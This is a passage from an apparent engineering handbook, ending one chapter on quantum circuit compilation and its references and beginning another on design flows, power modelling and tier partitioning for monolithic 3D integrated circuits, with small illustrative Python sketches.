Crosstalk errors occur when two gates run in parallel, increasing the fault rates of the parallel gates compared to the same gates run in isolation. The authors of Murali et al. (2020a) conducted extensive experiments on numerous IBM devices to characterize and mitigate crosstalk.
Application-Specific Compilation
Quantum compilers typically use generic rules to optimize every given quantum program and do not take program-specific information into account when performing aggressive optimization. Recent papers (Alam et al. 2020a,b,c) present algorithm-specific compilation approaches for QAOA, a prominent near-term algorithm. The ZZ interactions in QAOA can each be implemented with two CNOTs and one RZ operation inside a level and are commutative (Alam et al. 2020a), i.e., these operations can be reordered without affecting the circuit's output state. In Alam et al. (2020a), the authors propose several QAOA-specific optimizations, including parallelization of ZZ operations using a binary bin-packing algorithm.
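The decomposition underlying this optimization can be checked numerically. The following sketch (illustrative NumPy code, not drawn from the cited works) verifies that exp(−iγ Z⊗Z) equals two CNOTs sandwiching a single RZ(2γ) on the target qubit.

```python
import numpy as np

def rz(theta):
    # Single-qubit RZ rotation
    return np.diag([np.exp(-1j * theta / 2), np.exp(1j * theta / 2)])

# CNOT with qubit 0 as control (basis order |00>, |01>, |10>, |11>)
CNOT = np.array([[1, 0, 0, 0],
                 [0, 1, 0, 0],
                 [0, 0, 0, 1],
                 [0, 0, 1, 0]], dtype=complex)

gamma = 0.37
# ZZ(gamma) = exp(-i * gamma * Z (x) Z): diagonal phase by two-bit parity
zz = np.diag(np.exp(-1j * gamma * np.array([1, -1, -1, 1])))

# Two CNOTs and one RZ(2*gamma) on the target qubit reproduce ZZ(gamma)
decomp = CNOT @ np.kron(np.eye(2), rz(2 * gamma)) @ CNOT
print(np.allclose(zz, decomp))  # True
```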
Conclusion
Acknowledgments This material is based upon work supported by NSF (CNS-1814710, DGE-
1821766, CNS-2129675, CCF-2210963, DGE-2113839, ITE-2040667), gifts from Intel, and seed
grants from Penn State ICDS and Huck Institutes of the Life Sciences.
References
Abhari AJ, Faruque A, Dousti MJ, Svec L, Catu O, Chakrabati A, Chiang C-F, Vanderwilt S, Black
J, Chong F (2012) Scaffold: quantum programming language. Technical report, Department of
Computer Science, Princeton University
Abrams DM, Didier N, Johnson BR, da Silva MP, Ryan CA (2020) Implementation of XY
entangling gates with a single calibrated pulse. Nat Electr 3(12):744–750
Alam M, Ash-Saki A, Ghosh S (2020a) Circuit compilation methodologies for quantum approx-
imate optimization algorithm. In: 2020 53rd Annual IEEE/ACM International Symposium on
Microarchitecture (MICRO). IEEE, pp 215–228
Alam M, Ash-Saki A, Ghosh S (2020b) An efficient circuit compilation flow for quantum
approximate optimization algorithm. In: 2020 57th ACM/IEEE Design Automation Conference
(DAC). IEEE, pp 1–6
Alam M, Ash-Saki A, Li J, Chattopadhyay A, Ghosh S (2020c) Noise resilient compilation policies
for quantum approximate optimization algorithm. In: Proceedings of the 39th International
Conference on Computer-Aided Design, pp 1–7
Apolloni B, Cesa-Bianchi N, De Falco D (1990) A numerical implementation of “quantum
annealing”. In: Stochastic Processes, Physics and Geometry: Proceedings of the Ascona-
Locarno Conference, pp 97–111
Arute F, Arya K, Babbush R, Bacon D, Bardin JC, Barends R, Biswas R, Boixo S, Brandao FGSL,
Buell DA et al (2019) Quantum supremacy using a programmable superconducting processor.
Nature 574(7779):505–510
Ash-Saki A, Alam M, Ghosh S (2019) Qure: qubit re-allocation in noisy intermediate-scale
quantum computers. In: Proceedings of the 56th Annual Design Automation Conference 2019,
pp 1–6
Bhattacharjee D, Saki AA, Alam M, Chattopadhyay A, Ghosh S (2019) MUQUT: multi-constraint
quantum circuit mapping on NISQ computers. In: 2019 IEEE/ACM International Conference
on Computer-Aided Design (ICCAD). IEEE, pp 1–7
Broadbent A, Kashefi E (2009) Parallelizing quantum circuits. Theor Comput Sci 410(26):2489–
2510
Chatterjee A, Stevenson P, De Franceschi S, Morello A, de Leon NP, Kuemmeth F (2021)
Semiconductor qubits in practice. Nat Rev Phys 3(3):157–177
Cirac JI, Zoller P (1995) Quantum computations with cold trapped ions. Phys Rev Lett 74(20):4091
Cirq documentation. https://cirq.readthedocs.io/en/stable/
Cross AW, Bishop LS, Smolin JA, Gambetta JM (2017) Open quantum assembly language. arXiv
preprint arXiv:1707.03429
Deutsch D, Jozsa R (1992) Rapid solution of problems by quantum computation. Proc R Soc Lond
Ser A: Math Phys Sci 439(1907):553–558
Ding Y, Gokhale P, Lin SF, Rines R, Propson T, Chong FT (2020) Systematic crosstalk mitigation
for superconducting qubits via frequency-aware compilation. In: 2020 53rd Annual IEEE/ACM
International Symposium on Microarchitecture (MICRO). IEEE, pp 201–214
Farhi E, Goldstone J, Gutmann S (2014) A quantum approximate optimization algorithm. arXiv
preprint arXiv:1411.4028
Fowler AG (2011) Constructing arbitrary Steane code single logical qubit fault-tolerant gates.
Quantum Inf Comput 11(9–10):867–873
Fu P, Kishida K, Ross NJ, Selinger P (2020) A tutorial introduction to quantum circuit
programming in dependently typed proto-quipper. In: International Conference on Reversible
Computation. Springer, pp 153–168
Gambetta JM, Córcoles AD, Merkel ST, Johnson BR, Smolin JA, Chow JM, Ryan CA, Rigetti C,
Poletto S, Ohki TA et al (2012) Characterization of addressability by simultaneous randomized
benchmarking. Phys Rev Lett 109(24):240504
Green AS, Lumsdaine PL, Ross NJ, Selinger P, Valiron B (2013) Quipper: a scalable quantum pro-
gramming language. In: Proceedings of the 34th ACM SIGPLAN Conference on Programming
Language Design and Implementation, pp 333–342
Grover LK (1996) A fast quantum mechanical algorithm for database search. In: Proceedings of
the Twenty-Eighth Annual ACM Symposium on Theory of Computing, STOC’96. Association
for Computing Machinery, Philadelphia, pp 212–219
Heim B, Rønnow TF, Isakov SV, Troyer M (2015) Quantum versus classical annealing of Ising
spin glasses. Science 348(6231):215–217
Heim B, Soeken M, Marshall S, Granade C, Roetteler M, Geller A, Troyer M, Svore K (2020)
Quantum programming languages. Nat Rev Phys 2(12):709–722
Kadowaki T, Nishimori H (1998) Quantum annealing in the transverse Ising model. Phys Rev E 58(5):5355
Kjaergaard M, Schwartz ME, Braumüller J, Krantz P, Wang JI-J, Gustavsson S, Oliver WD (2020)
Superconducting qubits: current state of play. Annu Rev Condens Matter Phys 11:369–395
Kliuchnikov V, Maslov D, Mosca M (2012) Fast and efficient exact synthesis of single qubit
unitaries generated by Clifford and T gates. arXiv preprint arXiv:1206.5236
Lanzagorta M, Uhlmann J (2009) Quantum computer science. Morgan and Claypool Publishers.
ISBN:9781598297324
Li G, Ding Y, Xie Y (2019) Tackling the qubit mapping problem for NISQ-Era quantum devices.
In: Proceedings of the Twenty-Fourth International Conference on Architectural Support for
Programming Languages and Operating Systems, pp 1001–1014
Li G, Wu A, Shi Y, Javadi-Abhari A, Ding Y, Xie Y (2021) On the co-design of quantum
software and hardware. In: Proceedings of the Eighth Annual ACM International Conference
on Nanoscale Computing and Communication, pp 1–7
McCaskey AJ, Lyakh DI, Dumitrescu EF, Powers SS, Humble TS (2020) Xacc: a system-level
software infrastructure for heterogeneous quantum–classical computing. Quantum Sci Technol
5(2):024002
Montanaro A (2016) Quantum algorithms: an overview. NPJ Quantum Inf 2:15023
Morita S, Nishimori H (2008) Mathematical foundation of quantum annealing. J Math Phys
49(12):125210
Murali P, Baker JM, Javadi-Abhari A, Chong FT, Martonosi M (2019) Noise-adaptive compiler
mappings for noisy intermediate-scale quantum computers. In: Proceedings of the Twenty-
Fourth International Conference on Architectural Support for Programming Languages and
Operating Systems, pp 1015–1029
Murali P, McKay DC, Martonosi M, Javadi-Abhari A (2020a) Software mitigation of crosstalk on
noisy intermediate-scale quantum computers. In: Proceedings of the Twenty-Fifth International
Conference on Architectural Support for Programming Languages and Operating Systems,
pp 1001–1016
Murali P, Debroy DM, Brown KR, Martonosi M (2020b) Architecting noisy intermediate-scale
trapped ion quantum computers. In: 2020 ACM/IEEE 47th Annual International Symposium
on Computer Architecture (ISCA). IEEE, pp 529–542
Nielsen MA, Chuang I (2002) Quantum computation and quantum information. American
Association of Physics Teachers
Patel T, Tiwari D (2020) DisQ: a novel quantum output state classification method on IBM
quantum computers using openpulse. In: Proceedings of the 39th International Conference
on Computer-Aided Design, pp 1–9
Peruzzo A et al (2013) A variational eigenvalue solver on a quantum processor. arXiv preprint arXiv:1304.3061
Qiskit documentation. https://qiskit.org/documentation/
Qutip documentation. http://qutip.org/documentation.html
Reiher M, Wiebe N, Svore KM, Wecker D, Troyer M (2017) Elucidating reaction mechanisms on
quantum computers. Proc Natl Acad Sci 114(29):7555–7560
Rios F, Selinger P (2017) A categorical model for a quantum circuit description language. arXiv
preprint arXiv:1706.02630
Ross NJ (2015) Algebraic and logical methods in quantum computation. arXiv preprint
arXiv:1510.02198
Saki AA, Topaloglu RO, Ghosh S (2022) Muzzle the shuttle: efficient compilation for multi-trap
trapped-ion quantum computers. In: 2022 Design, Automation & Test in Europe Conference &
Exhibition (DATE). IEEE, pp 322–327
Santoro GE, Tosatti E (2006) Optimization using quantum mechanics: quantum annealing through
adiabatic evolution. J Phys A Math Gen 39(36):R393
Shende VV, Prasad AK, Markov IL, Hayes JP (2002) Reversible logic circuit synthesis. In:
Proceedings of the 2002 IEEE/ACM International Conference on Computer-Aided Design,
pp 353–360
Shor PW (1994) Algorithms for quantum computation: discrete logarithms and factoring. In: 35th
Annual Symposium on Foundations of Computer Science
Shor PW (1999) Polynomial-time algorithms for prime factorization and discrete logarithms on a
quantum computer. SIAM Rev 41(2):303–332
Siraichi MY, Fernandes dos Santos V, Collange C, Magno Quintão Pereira F (2018) Qubit
allocation. In: Proceedings of the 2018 International Symposium on Code Generation and
Optimization, pp 113–125
Smith RS, Curtis MJ, Zeng WJ (2016) A practical quantum instruction set architecture. arXiv
preprint arXiv:1608.03355
Staq-GitHub. https://github.com/softwareqinc/staq
Steiger DS, Häner T, Troyer M (2018) ProjectQ: an open source software framework for quantum computing. Quantum 2:49
Strawberry fields. GitHub. https://github.com/xanaduai/strawberryfields
Svore K, Geller A, Troyer M, Azariah J, Granade C, Heim B, Kliuchnikov V, Mykhailova M, Paz
A, Roetteler M (2018) Q# enabling scalable quantum computing and development with a high-
level DSL. In: Proceedings of the Real World Domain Specific Languages Workshop 2018,
pp 1–10
Tannu SS, Qureshi MK (2019) Not all qubits are created equal: a case for variability-aware
policies for NISQ-Era quantum computers. In: Proceedings of the Twenty-Fourth International
Conference on Architectural Support for Programming Languages and Operating Systems,
pp 987–999
tket-GitHub. https://github.com/cqcl/pytket
Trauzettel B, Bulaev DV, Loss D, Burkard G (2007) Spin qubits in graphene quantum dots. Nat
Phys 3(3):192–196
Treinish M et al (2019) Qiskit: an open-source framework for quantum computing
Wright K, Beck KM, Debnath S, Amini JM, Nam Y, Grzesiak N, Chen J-S, Pisenti NC,
Chmielewski M, Collins C et al (2019) Benchmarking an 11-qubit quantum computer. Nat
Commun 10(1):1–6
Wu X-C, Debroy DM, Ding Y, Baker JM, Alexeev Y, Brown KR, Chong FT (2021) Tilt:
achieving higher fidelity on a trapped-ion linear-tape quantum computing architecture. In: 2021
IEEE International Symposium on High-Performance Computer Architecture (HPCA). IEEE,
pp 153–166
Zulehner A (2019) Evaluating the flexibility of a* for mapping quantum circuits. In: Thomsen MK,
Soeken M (eds) Reversible computation. Springer International Publishing, Cham, pp 171–190
Zulehner A, Paler A, Wille R (2018) An efficient methodology for mapping quantum circuits to
the IBM QX architectures. IEEE Trans Comput-Aided Design Integr Circuits Syst 38(7):1226–
1236
Design and Tool Solutions for Monolithic
Three-Dimensional Integrated Circuits 22
Kyungwook Chang and Sung Kyu Lim
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 752
Monolithic 3D IC Design Flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 753
Motivation and Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 753
Benefit Trends of Monolithic 3D ICs Across Technology Nodes . . . . . . . . . . . . . . . . . . . . 754
A Design-Aware Partitioning Approach to Monolithic 3D IC with 2D
Commercial Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 761
Power Supply Integrity of Monolithic Three-Dimensional Integrated Circuits . . . . . . . . . . . . 773
Motivation and Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 773
System-Level Power Delivery Network Analysis for Monolithic 3D ICs . . . . . . . . . . . . . . 774
Monolithic 3D ICs for Deep Neural Network Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 785
Motivation and Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 785
Impact of Monolithic 3D ICs on On-Chip Deep Neural Networks
Targeting Speech Recognition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 786
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 801
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 802
K. Chang
Suwon, South Korea
e-mail: [email protected]
S. K. Lim
Atlanta, USA
e-mail: [email protected]
Abstract
The content of this chapter is organized into three categories: design flow, power supply integrity, and application of mono-
lithic three-dimensional integrated circuits.
In design flow, an approach to implement monolithic three-dimensional inte-
grated circuits is introduced. Power supply integrity issues of monolithic three-
dimensional stacking technology are addressed. Lastly, deep neural network
hardware using monolithic three-dimensional integrated circuits is presented, as implementing low-power and high-performance deep neural network hardware is known to be difficult although such networks are widespread and powerful in recognition tasks.
Introduction
As technology scaling faces its physical limits in channel length scaling, worsening process variations, lithography constraints, increased parasitics, and rising manufacturing costs, monolithic three-dimensional (M3D) stacking technology takes
center stage in continuing Moore’s law. In M3D stacking technology, the devices
are fabricated onto multiple tiers sequentially with nanosized monolithic inter-
tier vias (MIVs), which connect the topmost metal layer of the bottom tier and
the bottommost metal layer of the top tier as shown in Fig. 1. Because MIVs
are extremely small, they can achieve much higher vertical integration density
and lower resistive-capacitive (RC) parasitics compared to through-silicon vias
(TSVs). Owing to the enhancement of fabrication technology, one can harness the
true benefit of M3D integrated circuits (ICs) with fine-grained vertical integration
(Okada et al. 2014).
Fig. 1 Cross-section of an M3D IC: the top and bottom tiers are separated by an inter-layer dielectric (ILD) and connected by MIVs
The industry has transitioned from planar MOSFETs to 3D FinFETs at the 14/16 nm node to combat worsening electrostatics and short-channel effects caused by channel length scaling. Improved transistor characteristics in FinFETs are achieved
at the cost of higher parasitic capacitance associated with the 3D fins and the
introduction of the local interconnects that are needed to contact the devices to
metal routing layers. Due to limited viable transistor options beyond FinFETs and
the increasing cost and complexity of lithography strategies to print sub-7 nm node
features, traditional Moore’s law scaling is slowing down. These limitations create a
technology inflection point for “More than Moore” technologies (Arden et al. n.d.)
such as M3D ICs to bring value and be adopted into mainstream designs.
To be deployed in real-world designs, M3D ICs need to be cost-effective and deliver power or performance improvements of a magnitude similar to that obtained by Moore's law process scaling. Evaluating cost-effectiveness is
non-trivial as M3D stacking technology is still under active research and develop-
ment. Hence, the power improvement of M3D ICs in an in-order, 32-bit application
processor is evaluated while assessing whether or not that improvement is indepen-
dent of the underlying technology node.
Currently, EDA tools do not support M3D ICs; hence, previous studies have explored implementation approaches for M3D ICs using 2D commercial tools. In Panth et al. (n.d.), in order to estimate cell placement and wire-length of an M3D IC, the dimensions of cells and wires are shrunk, and a shrunk-2D design is implemented in half the footprint of the 2D IC. However, shrunk-2D designs are prone to inaccurate buffer insertion because of inaccurate wire-load estimation (Chang et al. 2017). Moreover, the flow is completely design-agnostic and utilizes a very large number of MIVs, partitioning locally connected cells into separate tiers and resulting in a non-optimal tier partition. Another M3D IC design flow is proposed in Billoint et al. (2015), which folds the 2D placement at the center of the die into two separate tiers. However, this design flow shows marginal wire-length savings and no power savings, and it does not take design details into account to guide partitioning, resulting in a non-optimal solution. Therefore, a new M3D IC design flow is needed that incorporates design and micro-architecture information when partitioning cells onto multiple tiers while supporting accurate buffer insertion with accurate wire-load estimation.
First, a comprehensive study investigating the power impact of M3D ICs across technology nodes is presented using a commercial in-order 32-bit application processor on foundry 28 nm, 14/16 nm, and 7 nm technology nodes. The study shows that M3D stacking technology provides maximum power savings at the 28 nm technology node and that the benefits improve at higher clock frequencies owing to the reduction of standard cell area in addition to wire-length savings. An in-depth analysis of the results and guidelines for M3D ICs are presented to support these observations.
Table 1 Key metrics of foundry 28 nm, 14/16 nm, and 7 nm technology nodes used in the designs
compared to 5 nm technology node
Parameters 28 nm 14/16 nm 7 nm 5 nm
Transistor type Planar FinFET FinFET FinFET
VDD (V) 0.9 0.8 0.7 0.7
CPP (nm) 110 ∼ 120 78 ∼ 90 50 48
M1 pitch (nm) 90 64 36 30
MIV cross-section (nm) 80 × 80 40 × 40 32 × 32 28 × 28
MIV height (nm) 140 170 170 170
(LEF) files.1 The transistor models incorporate scaled channel lengths and fin-
pitches and increased fin-heights compared to previous technology nodes in order to
improve performance at lower supply voltages. Multiple threshold voltages (VT ) and
variation corners are supported in the 7 nm PDK. Process metrics such as gate pitch
and metal pitches are linearly scaled from previous technology nodes, and the design
rules are created considering lithography challenges associated with printing these
pitches. The interconnect stack is modeled based on similar scaling assumptions.
The 7 nm standard cell libraries and memory macros are designed from scratch
and characterized using the PDK.
The M3D IC requires six metal layers on both top and bottom tiers. The MIVs
connect M6 of the bottom tier with M1 of the top tier. The size of the MIVs is
limited to be 2× the minimum via size allowed in the technology node to reduce
MIV resistance. The MIV heights take into account the fact that the MIVs need to
traverse through inter-tier dielectrics and transistor substrates to contact M1 on
the top tier. The MIV height increases from 28 nm to 14/16 nm and 7 nm technology
nodes because of the introduction of local interconnect middle-of-line (MOL) layer
in the sub-20 nm nodes.
Since M3D IC fabrication is done sequentially, high-temperature front-end
device processing of the top tier can adversely affect the interconnects in the bottom
tier, while low-temperature processing will result in inferior top-tier transistors.
Recent work reporting low-temperature processes that achieve similar device behavior across both tiers has been presented (Batude et al. 2015), and hence, all
implementations are done with the assumption of similar device characteristics in
both tiers.
Implementation Methodology
The standard cell libraries and memory macros for the 28 nm, 14/16 nm, and 7 nm
technology nodes are used to synthesize, place, and route the full-chip design. 2D
and M3D ICs of the application processor are implemented sweeping the target
frequency from 500 MHz to 1.2 GHz in 100 MHz increments across the three
1 During the writeup of this manuscript, a 7 nm academic PDK was not available, hence the need for our own development.
technology nodes. M3D ICs are implemented using shrunk-2D design flow (Panth
et al. n.d.). Full-chip timing is met at the appropriate corners (i.e., slow corner
for setup and fast corner for hold). Power is reported at the typical corner. The
floorplan of the design is customized for each technology node to meet timing, but
kept constant during frequency sweeps. Multiple iterations of the 2D and M3D IC
floorplan are required at each node to ensure that the designs meet timing. The chip
area is fixed such that the final cell utilization is similar across technology nodes.
Fig. 2 GDS layouts of (a) 28 nm 2D, (b) 28 nm M3D, (c) 14/16 nm 2D, (d) 14/16 nm M3D, (e)
7 nm 2D, and (f) 7 nm M3D ICs of the application processor at 1.1 GHz
2 We acknowledge the contribution of ARM for their donation of a commercial 32-bit processor architecture for this research.
Pdyn = PINT + α · (Cpin + Cwire) · VDD² · fclk , (1)

where PINT is the cell internal power, and the second term describes net switching
power where Cpin and Cwire are the pin and wire capacitance in the design. rp2w is
the ratio of the pin capacitance to the wire capacitance. The primary advantage of
M3D ICs comes from wire-length reduction resulting in reduced wire capacitance
switching power dissipation. With the reduction in wires, the synthesis, place, and
route tools can also reduce the drive-strengths of the gates and buffers used to meet
the design targets leading to reduced internal power (PINT ) and pin capacitance
switching component as well. The total power reduction in an M3D IC depends
on wire-length reduction, the number of cells and cell size reduction, the ratio of
pin capacitance to wire capacitance, and net switching power to internal power in
the 2D IC.
Further extending Eq. 1, as internal power and pin capacitance depend on
standard cell area, and wire-length affects wire capacitance, M3D power savings
can be denoted as follows:
ΔPdyn = Δcell · (PINT + α · rp2w · Cwire · VDD² · fclk) + Δwire · α · Cwire · VDD² · fclk , (2)
where Δcell denotes the standard cell area saving of M3D ICs over the 2D counterparts, and Δwire denotes the wire-length saving in the M3D IC. This simple linear model gives useful insight into the power saving trends across technology nodes and frequencies.
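To make the model concrete, the sketch below evaluates it with assumed, illustrative fractions (normalized so that the total 2D dynamic power is about 1.0); none of the numbers are measurements from this chapter.

```python
# Toy evaluation of the linear M3D power-saving model (Eq. 2).
# All fractions below are assumptions for illustration only.
P_int = 0.45        # internal power fraction of the 2D design
P_sw_wire = 0.30    # wire-capacitance switching power fraction
r_p2w = 0.8         # assumed pin-to-wire capacitance ratio
P_sw_pin = r_p2w * P_sw_wire  # pin-capacitance switching power fraction

def m3d_power_saving(d_cell, d_wire):
    # Cell-area saving shrinks internal and pin-cap power;
    # wire-length saving shrinks wire-cap switching power.
    return d_cell * (P_int + P_sw_pin) + d_wire * P_sw_wire

# e.g., 10% standard cell area saving and 22% wire-length saving
print(f"{m3d_power_saving(0.10, 0.22):.3f} of total 2D power saved")
```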
Analysis of Trends
As can be seen from Fig. 5, at a given frequency, the wire-length saving (Δwire) as well as the standard cell area saving (Δcell) is nearly the same across all three technology nodes.
As the clock frequency is swept, the wire-length saving (Δwire) does not vary by a large magnitude, ranging between 20% and 25% as shown in Fig. 5. However, with increasing clock frequency, 2D ICs utilize more buffers and higher drive-strength cells to meet timing, whereas M3D ICs can meet timing with fewer buffers and lower drive-strength cells because of the wire-length saving. Hence, the standard cell area saving (Δcell) increases from 2% up to 10 ∼ 12% with increasing frequency. With these observations, Eq. 2 is modified to denote Δcell as a function of fclk in order to reflect the impact of frequency on standard cell area savings.
ΔPdyn = Δcell(fclk) · (PINT + α · rp2w · Cwire · VDD² · fclk) + Δwire · α · Cwire · VDD² · fclk (3)
Fig. 6 Power breakdown into (a) internal power, pin capacitance switching power, wire capaci-
tance switching power, and leakage power, (b) combinational cell power, clock power, sequential
cell power, and memory power at the minimum and maximum frequencies of each technology
node. The inset plots show the power reduction of M3D ICs for each power component
Fig. 7 Wire capacitance to total capacitance ratio, and net switching power to total power ratio in
2D ICs in 28 nm, 14/16 nm, and 7 nm technology nodes
larger cells to drive the same wire-length, effectively increasing rp2w. Hence,
technologies with larger transistor fanouts will benefit more from M3D ICs.
where Ctot is the total capacitance (Cpin + Cwire) of a 2D IC. At this clock frequency, the M3D power saving does not depend on rp2w. Moreover, as discussed previously, PINT being the dominant component of the total power, the M3D power saving depends more on Δcell and the ratio of internal power to net switching power than on Δwire or rp2w.
Figure 6b shows power breakdown according to the type of cells. As the number
of hard macros (e.g., memory blocks) and sequential cells is fixed, the power
Table 2 Normalized iso-performance design and power metric comparison of 2D and M3D ICs
with application processor in 28 nm, 14/16 nm, and 7 nm technology nodes. All values are
normalized to corresponding 28 nm 2D parameters. Capacitance and power values are normalized
to 28 nm 2D total capacitance and 28 nm 2D total power, respectively
Parameters 2D: 28 nm 14/16 nm 7 nm M3D saving: 28 nm 14/16 nm 7 nm
Footprint 1×1 0.64 × 0.64 0.41 × 0.35 −51.1% −50% −54.7%
Density 1 0.899 0.803 −10.9% −8.9% −12.3%
Cell count 1 1.029 1.251 −7.8% −7.3% −9.5%
Std. cell area 1 0.32 0.085 −12.6% −7.3% −9.8%
Wire-length 1 0.649 0.437 −23.6% −22.3% −27.5%
Wire cap 0.544 0.328 0.207 −23.3% −13.1% −13.2%
Pin cap 0.456 0.378 0.205 −16.5% −9.1% −12%
Total cap 1 0.706 0.412 −20.2% −11% −12.6%
Internal power 0.443 0.278 0.136 −11.4% −7.9% −8.6%
Wire cap switching power 0.271 0.129 0.063 −21.8% −14% −12.7%
Pin cap switching power 0.227 0.148 0.062 −14.9% −10.1% −11.5%
Leakage power 0.059 0.001 0.001 −13.4% −5% −3.2%
Total power 1 0.557 0.262 −15.1% −9.9% −10.3%
consumed by these cells does not change in M3D ICs. On the other hand, power consumed by combinational cells and the clock signal can be reduced effectively in M3D ICs by utilizing fewer buffers and lower drive-strength cells.
Table 2 shows all the important design metrics of both 2D and M3D ICs across foundry 28 nm, 14/16 nm, and 7 nm technology nodes at 1.1 GHz. Since 1.1 GHz is the maximum frequency for the 28 nm and 14/16 nm implementations and the second highest for the 7 nm design, significant standard cell area savings as well as wire-length savings are achieved with M3D ICs.
Since the operating clock frequency is high, M3D ICs save standard cell area by 9.9% on average across the three implementations, resulting in internal power and pin capacitance switching power savings. Although the internal power and pin capacitance switching power savings (11.4% and 14.9% in the 28 nm designs) are smaller than the wire capacitance switching power saving (21.8%), these components account for more than 70% of the total power and therefore contribute more to the total power savings.
Based on the observations in the previous section, a new methodology called "cascade-2D design flow" to implement M3D ICs using 2D commercial tools is presented in this section. Cascade-2D design flow utilizes a design-aware partitioning scheme
where functional modules with very large number of connections are partitioned
into separate tiers.
Fig. 8 M3D IC design scheme of cascade-2D design flow. (a) A cascade-2D design implemen-
tation with a set of anchor cells and dummy wires which models MIVs, and (b) the equivalent
M3D IC
In this flow, MIVs are modeled as sets of anchor cells and dummy wires, which enable implementing and optimizing both the top and bottom tiers simultaneously in a 2D IC. Cascade-2D design flow reduces standard cell area effectively, resulting
in significantly better power savings than shrunk-2D design flow. Experimental
results show that M3D ICs implemented with cascade-2D design flow (i.e., cascade-
2D M3D ICs) can achieve up to 4× better power savings compared to those
with shrunk-2D design flow (i.e., shrunk-2D M3D ICs), while using an order of
magnitude fewer MIVs. In the best-case scenario, cascade-2D M3D ICs result in 25%
higher performance at iso-power and up to 20% power reduction at iso-performance
compared to 2D ICs. Additionally, by leveraging smaller standard cells, M3D ICs
can save up to 10% die area which directly translates to reduced costs.
Figure 8 shows the "cut-and-slide" methodology of cascade-2D design flow with sets of anchor cells and dummy wires. The anchor cells and dummy wires model MIVs, and the cascade-2D design implementation in Fig. 8a is functionally equivalent to the M3D IC in Fig. 8b.
Implementation Methodology
Table 3 presents a qualitative comparison of cascade-2D design flow with shrunk-2D
design flow. Figure 9 shows the flow diagram of this methodology. First, functional
blocks are partitioned into two groups, the top and bottom group, creating signals
crossing the two groups, which become MIVs in an M3D IC. Then, the location of
MIVs are determined, and lastly, a cascade-2D design is implemented with sets of
anchor cells and dummy wires in 2D space, which is equivalent to the final M3D IC.
Table 3 Qualitative comparison of cascade-2D design flow and shrunk-2D design flow
Cascade-2D design flow | Shrunk-2D design flow
Supports block- and gate-level M3D ICs | Supports only gate-level M3D ICs
Capable of handling RTL-level constraints | Cannot handle RTL-level constraints
Highly flexible; can implement any partitioning algorithm | Implements area-balanced min-cut algorithm for partitioning cells
Designer has complete control over tier-assignment of cells/blocks | Designer controls bin size but not actual tier-assignment of gates
Implements top and bottom tiers in a single design | Implements top and bottom tiers separately
Buffer insertion based on actual technology parameters | Buffer insertion based on shrunk technology parameters
Fig. 9 Flow diagram of cascade-2D design flow: implement the 2D design and extract timing path information; partition the RTL into two groups (top/bottom); implement the bottom group and determine MIV locations; place MIV ports in each partition at the same locations; route MIV ports in the two partitions in the top view; and place anchor cells in each partition view
Because M3D ICs offer vertical integration of cells, power and performance
improvement is achieved by placing inter-communicating functional modules sepa-
rated by a large distance in the xy-plane in a 2D IC on separate tiers and reducing
the distance by utilizing the z-axis in an M3D IC. With a detailed understanding
of the micro-architecture organization, functional modules can be pre-partitioned
into separate tiers. For example, consider two functional modules whose connecting
signals have a tight-timing budget (e.g., a data path unit and its register bank).
Placing these modules into separate tiers and connecting them with MIVs can help
reduce the wire-length.
In case it is non-trivial to partition based on the understanding of micro-
architectural organization, the design information from a 2D implementation can
be utilized to help guide the partitioning process. By extracting timing paths from
a 2D IC, the number of timing paths crossing each pair of functional modules can
be quantified, which is called “degree of connectivity” between functional modules.
Fig. 10 An example of the design-aware partitioning scheme of cascade-2D design flow. (a) Pre-partitioned modules (yellow boxes) and degree of connectivity (numbers on the arrows) of the remaining modules (green boxes). (b) Result of the design-aware partitioning
The standard cell area of each functional module is also extracted from the 2D IC
to balance cell area between the tiers.
After obtaining the degree of connectivity of functional modules and their cell area, the design is partitioned into two groups based on two criteria: (1) maximize the number of timing paths crossing the two groups, and (2) balance the standard cell area of the two groups.
These criteria ensure that (1) functional blocks with a very high degree of connectivity are placed onto separate tiers, minimizing the distance between them, and (2) the standard cell area of the two tiers is balanced. Figure 10 shows an example
of design-aware partitioning. Modules A and B are fixed on two different groups based on the organization of the design micro-architecture; modules C, D, E, and F are partitioned to maximize the number of timing paths crossing the two groups while balancing the cell area of the two groups. However, cascade-2D design flow is extremely
flexible and can incorporate any number of constraints for partitioning cells or
modules into separate tiers. Depending on the type of design, the designer may wish
to employ different partitioning criteria than presented here and the subsequent steps
(MIV Planning Stage and Cascade-2D Stage) would remain the same. Hence, this
flow is an ideal platform to evaluate different tier partitioning schemes for M3D ICs.
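As an illustration of these criteria, the following deliberately naive sketch enumerates tier assignments for the example of Fig. 10; the module names, areas, and path counts are invented, and a production flow would use a smarter heuristic than exhaustive enumeration.

```python
import itertools

# Illustrative design-aware partitioner: enumerate tier assignments, keep
# those whose standard cell area is balanced, and pick the one maximizing
# timing paths crossing the two groups. All inputs are invented.
def partition(free, fixed, area, paths, max_imbalance=0.1):
    total = sum(area.values())
    best, best_cross = None, -1
    for choice in itertools.product(("top", "bottom"), repeat=len(free)):
        tier = {**fixed, **dict(zip(free, choice))}
        top_area = sum(area[m] for m in tier if tier[m] == "top")
        if abs(2 * top_area - total) > max_imbalance * total:
            continue  # reject area-imbalanced assignments
        cross = sum(n for (a, b), n in paths.items() if tier[a] != tier[b])
        if cross > best_cross:
            best, best_cross = tier, cross
    return best, best_cross

tiers, cross = partition(
    free=["C", "D", "E", "F"], fixed={"A": "top", "B": "bottom"},
    area={m: 1.0 for m in "ABCDEF"},
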